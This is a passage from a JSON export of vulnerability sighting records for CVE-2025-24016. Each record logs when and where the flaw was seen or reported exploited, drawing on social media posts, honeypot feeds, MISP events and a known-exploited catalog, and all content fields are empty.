"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrjv4h54s72s", "content": "", "creation_timestamp": "2025-06-14T02:17:49.002261Z"}, {"uuid": "e950a328-07a9-4dda-8c67-3d28840d48e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114660473206955438", "content": "", "creation_timestamp": "2025-06-10T18:26:15.314272Z"}, {"uuid": "4d3d7089-669c-4c4b-91f8-406d0bc29e2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3lrboz255ly2b", "content": "", "creation_timestamp": "2025-06-10T20:07:13.779484Z"}, {"uuid": "d14dca64-1b26-4308-8eab-ce7b622c23f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lruxkbm37a2z", "content": "", "creation_timestamp": "2025-06-18T12:00:38.222520Z"}, {"uuid": "94e3e49e-90c6-4618-94d6-00aa3857291f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrltjc6nwk27", "content": "", "creation_timestamp": "2025-06-14T20:54:34.007553Z"}, {"uuid": "6138c9da-eaf5-453c-8614-426078daba1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrcduz5r6a2r", "content": "", "creation_timestamp": "2025-06-11T02:20:47.496731Z"}, {"uuid": "cfb28d38-03e5-47ac-9d27-10e929153318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "a7f2c0d3-4f90-4bed-aa86-3d872906af61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lrcrv4iepc2h", "content": "", "creation_timestamp": "2025-06-11T06:31:23.491430Z"}, {"uuid": "7e985fe5-51cc-4fb9-969d-aeb3fab718bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lrcshhfqmc2h", "content": "", "creation_timestamp": "2025-06-11T06:41:39.280565Z"}, {"uuid": "1f95786a-0526-4601-8d6c-04555898ae8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html", "content": "", "creation_timestamp": "2025-06-09T12:46:00.000000Z"}, {"uuid": "4fddba2f-43ff-4839-84d1-a42466c90a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "fa2e6ae7-35eb-4586-bebb-fc3f93de2102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "2f70f152-73ec-4722-bc5b-10f833a900e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lpmyc6ffdo2u", "content": "", "creation_timestamp": "2025-05-20T21:02:22.013716Z"}, {"uuid": "8923eafa-2541-4ca5-8553-4a20975ee904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "8805c37f-7987-4b01-96ed-5f6485c75384", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "4e99d35a-a5cd-438d-88f2-59708c3a38ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "7cb32ebf-6663-46f5-b2bb-74900df76016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:04.000000Z"}, {"uuid": "4490092d-381d-43b1-94f7-1ea8aab87411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-28T08:23:31.000000Z"}, {"uuid": "ce85159a-ccce-4ab9-ba5f-5b7e8f1cebab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/573ac1af-09ee-407c-8c57-49f646908b21", "content": "", "creation_timestamp": "2026-02-02T12:25:59.085733Z"}, {"uuid": "b0edf5eb-0ecd-48cc-8055-a21d1c9590e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-04)", "content": "", "creation_timestamp": "2026-04-04T00:00:00.000000Z"}]}